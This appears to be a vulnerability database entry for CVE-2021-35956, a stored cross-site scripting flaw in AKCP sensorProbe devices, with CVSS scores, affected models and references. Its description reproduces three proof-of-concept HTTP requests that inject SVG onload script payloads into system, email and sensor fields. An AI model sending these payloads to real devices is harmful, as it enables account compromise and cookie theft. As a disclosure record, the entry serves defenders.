Search criteria
1 vulnerability found for sensorprobe4 by akcp
VAR-202106-1093
Vulnerability from variot - Updated: 2025-01-30 19:49Stored cross-site scripting (XSS) in the embedded webserver of AKCP sensorProbe before SP480-20210624 enables remote authenticated attackers to introduce arbitrary JavaScript via the Sensor Description, Email (from/to/cc), System Name, and System Location fields. AKCP sensorProbe is a platform-independent environmental and safety monitoring equipment of AKCP company in the United States. Just assign an IP address and connect to the embedded web server. The correct verification of client data, an attacker can use this vulnerability to lure users to click to execute client code to steal user cookie credentials.
1) Stored Cross-Site Scripting via System Settings
POST /system?time=32e004c941f912 HTTP/1.1 Host: [target] Content-Length: 114 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://[target] Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://[target]/system?time=32e004c941f912 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close
_SA01=System+Namer&_SA02=RDC&_SA03=Namexss>&_SA04=1&_SA06=0&_SA36=0&_SA37=0&sbt1=Save
2) Stored Cross-Site Scripting via Email Settings
POST /mail?time=32e004c941f912 HTTP/1.1 Host: [target] Content-Length: 162 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://[target] Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://[target]/mail?time=32e004c941f912 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close
_PS03=test@test.com&_PS04=test@test.com&_PS05_0=test@test.com&_PS05_1=test@test.comr&_PS05_3=xxss>&_PS05_4=&sbt2=Save
3) Stored Cross-Site Scripting via Sensor Description
POST /senswatr?index=0&time=32e004c941f912 HTTP/1.1 Host: [target] Content-Length: 55 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://[target] Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://[target]/senswatr?index=0&time=32e004c941f912 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: CPCookie=sensors=400 Connection: close
_WT00-IX=">xss>&_WT03-IX=2&sbt1=Save
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202106-1093",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "sensorprobe4",
"scope": "lt",
"trust": 1.0,
"vendor": "akcp",
"version": "sp480-20210624"
},
{
"model": "sensorprobe8-x60",
"scope": "lt",
"trust": 1.0,
"vendor": "akcp",
"version": "sp480-20210624"
},
{
"model": "sensorprobe2",
"scope": "lt",
"trust": 1.0,
"vendor": "akcp",
"version": "sp480-20210624"
},
{
"model": "sensorprobe8",
"scope": "lt",
"trust": 1.0,
"vendor": "akcp",
"version": "sp480-20210624"
},
{
"model": "sensorprobe8-x20",
"scope": "lt",
"trust": 1.0,
"vendor": "akcp",
"version": "sp480-20210624"
},
{
"model": "sensorprobe \u003csp480-20210624",
"scope": null,
"trust": 0.6,
"vendor": "akcp",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-46654"
},
{
"db": "NVD",
"id": "CVE-2021-35956"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Tyler Butler",
"sources": [
{
"db": "PACKETSTORM",
"id": "163343"
}
],
"trust": 0.1
},
"cve": "CVE-2021-35956",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"confidentialityImpact": "NONE",
"exploitabilityScore": 6.8,
"id": "CVE-2021-35956",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "LOW",
"trust": 1.1,
"vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CNVD-2021-46654",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 2.3,
"id": "CVE-2021-35956",
"impactScore": 2.7,
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2021-35956",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "CNVD",
"id": "CNVD-2021-46654",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-202106-1985",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2021-35956",
"trust": 0.1,
"value": "LOW"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-46654"
},
{
"db": "VULMON",
"id": "CVE-2021-35956"
},
{
"db": "CNNVD",
"id": "CNNVD-202106-1985"
},
{
"db": "NVD",
"id": "CVE-2021-35956"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Stored cross-site scripting (XSS) in the embedded webserver of AKCP sensorProbe before SP480-20210624 enables remote authenticated attackers to introduce arbitrary JavaScript via the Sensor Description, Email (from/to/cc), System Name, and System Location fields. AKCP sensorProbe is a platform-independent environmental and safety monitoring equipment of AKCP company in the United States. Just assign an IP address and connect to the embedded web server. The correct verification of client data, an attacker can use this vulnerability to lure users to click to execute client code to steal user cookie credentials. \n\n\n1) Stored Cross-Site Scripting via System Settings \n\nPOST /system?time=32e004c941f912 HTTP/1.1\nHost: [target]\nContent-Length: 114\nCache-Control: max-age=0\nUpgrade-Insecure-Requests: 1\nOrigin: http://[target]\nContent-Type: application/x-www-form-urlencoded\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nReferer: http://[target]/system?time=32e004c941f912\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.9\nConnection: close\n\n_SA01=System+Namer\u0026_SA02=RDC\u0026_SA03=Name\u003csvg/onload=alert`xss`\u003e\u0026_SA04=1\u0026_SA06=0\u0026_SA36=0\u0026_SA37=0\u0026sbt1=Save\n\n2) Stored Cross-Site Scripting via Email Settings \n\nPOST /mail?time=32e004c941f912 HTTP/1.1\nHost: [target]\nContent-Length: 162\nCache-Control: max-age=0\nUpgrade-Insecure-Requests: 1\nOrigin: http://[target]\nContent-Type: application/x-www-form-urlencoded\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nReferer: http://[target]/mail?time=32e004c941f912\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.9\nConnection: close\n\n\n_PS03=test@test.com\u0026_PS04=test@test.com\u0026_PS05_0=test@test.com\u0026_PS05_1=test@test.comr\u0026_PS05_3=\u003csvg/onload=alert`xxss`\u003e\u0026_PS05_4=\u0026sbt2=Save\n\n3) Stored Cross-Site Scripting via Sensor Description\n\nPOST /senswatr?index=0\u0026time=32e004c941f912 HTTP/1.1\nHost: [target]\nContent-Length: 55\nCache-Control: max-age=0\nUpgrade-Insecure-Requests: 1\nOrigin: http://[target]\nContent-Type: application/x-www-form-urlencoded\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nReferer: http://[target]/senswatr?index=0\u0026time=32e004c941f912\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.9\nCookie: CPCookie=sensors=400\nConnection: close\n\n_WT00-IX=\"\u003e\u003csvg/onload=alert`xss`\u003e\u0026_WT03-IX=2\u0026sbt1=Save\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2021-35956"
},
{
"db": "CNVD",
"id": "CNVD-2021-46654"
},
{
"db": "VULMON",
"id": "CVE-2021-35956"
},
{
"db": "PACKETSTORM",
"id": "163343"
}
],
"trust": 1.62
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2021-35956",
"trust": 2.5
},
{
"db": "PACKETSTORM",
"id": "163343",
"trust": 1.8
},
{
"db": "CNVD",
"id": "CNVD-2021-46654",
"trust": 0.6
},
{
"db": "EXPLOIT-DB",
"id": "50080",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202106-1985",
"trust": 0.6
},
{
"db": "OTHER",
"id": "NONE",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2021-35956",
"trust": 0.1
}
],
"sources": [
{
"db": "OTHER",
"id": null
},
{
"db": "CNVD",
"id": "CNVD-2021-46654"
},
{
"db": "VULMON",
"id": "CVE-2021-35956"
},
{
"db": "PACKETSTORM",
"id": "163343"
},
{
"db": "CNNVD",
"id": "CNNVD-202106-1985"
},
{
"db": "NVD",
"id": "CVE-2021-35956"
}
]
},
"id": "VAR-202106-1093",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "OTHER",
"id": null
},
{
"db": "CNVD",
"id": "CNVD-2021-46654"
}
],
"trust": 1.7
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
},
{
"category": [
"embedded device"
],
"sub_category": "sensor",
"trust": 0.1
}
],
"sources": [
{
"db": "OTHER",
"id": null
},
{
"db": "CNVD",
"id": "CNVD-2021-46654"
}
]
},
"last_update_date": "2025-01-30T19:49:00.537000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "CVE-2021-35956",
"trust": 0.1,
"url": "https://github.com/tcbutler320/CVE-2021-35956 "
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2021-35956"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-79",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2021-35956"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.8,
"url": "https://tbutler.org/2021/06/28/cve-2021-35956"
},
{
"trust": 1.7,
"url": "https://www.akcp.com/support-center/customer-login/sensor-probe-firmware-changelog/"
},
{
"trust": 1.7,
"url": "http://www.akcp.in.th/downloads/firmwares/sp480-20210624.zip"
},
{
"trust": 1.7,
"url": "http://packetstormsecurity.com/files/163343/akcp-sensorprobe-spx476-cross-site-scripting.html"
},
{
"trust": 1.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-35956"
},
{
"trust": 0.6,
"url": "https://www.exploit-db.com/exploits/50080"
},
{
"trust": 0.1,
"url": "https://ieeexplore.ieee.org/abstract/document/10769424"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/79.html"
},
{
"trust": 0.1,
"url": "https://github.com/tcbutler320/cve-2021-35956"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "http://[target]/mail?time=32e004c941f912"
},
{
"trust": 0.1,
"url": "http://[target]/senswatr?index=0\u0026time=32e004c941f912"
},
{
"trust": 0.1,
"url": "http://[target]"
},
{
"trust": 0.1,
"url": "https://www.akcp.com/"
},
{
"trust": 0.1,
"url": "https://www.akcp.com/support-center/customer-login/sensorprobe-series-firmware-download/"
},
{
"trust": 0.1,
"url": "http://[target]/system?time=32e004c941f912"
}
],
"sources": [
{
"db": "OTHER",
"id": null
},
{
"db": "CNVD",
"id": "CNVD-2021-46654"
},
{
"db": "VULMON",
"id": "CVE-2021-35956"
},
{
"db": "PACKETSTORM",
"id": "163343"
},
{
"db": "CNNVD",
"id": "CNNVD-202106-1985"
},
{
"db": "NVD",
"id": "CVE-2021-35956"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "OTHER",
"id": null
},
{
"db": "CNVD",
"id": "CNVD-2021-46654"
},
{
"db": "VULMON",
"id": "CVE-2021-35956"
},
{
"db": "PACKETSTORM",
"id": "163343"
},
{
"db": "CNNVD",
"id": "CNNVD-202106-1985"
},
{
"db": "NVD",
"id": "CVE-2021-35956"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-07-02T00:00:00",
"db": "CNVD",
"id": "CNVD-2021-46654"
},
{
"date": "2021-06-30T00:00:00",
"db": "VULMON",
"id": "CVE-2021-35956"
},
{
"date": "2021-07-02T15:30:25",
"db": "PACKETSTORM",
"id": "163343"
},
{
"date": "2021-06-30T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202106-1985"
},
{
"date": "2021-06-30T12:15:07.683000",
"db": "NVD",
"id": "CVE-2021-35956"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-07-02T00:00:00",
"db": "CNVD",
"id": "CNVD-2021-46654"
},
{
"date": "2021-07-06T00:00:00",
"db": "VULMON",
"id": "CVE-2021-35956"
},
{
"date": "2021-07-07T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202106-1985"
},
{
"date": "2021-07-06T13:20:33.377000",
"db": "NVD",
"id": "CVE-2021-35956"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202106-1985"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "AKCP sensorProbe cross-site scripting vulnerability",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-46654"
},
{
"db": "CNNVD",
"id": "CNNVD-202106-1985"
}
],
"trust": 1.2
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "xss",
"sources": [
{
"db": "PACKETSTORM",
"id": "163343"
},
{
"db": "CNNVD",
"id": "CNNVD-202106-1985"
}
],
"trust": 0.7
}
}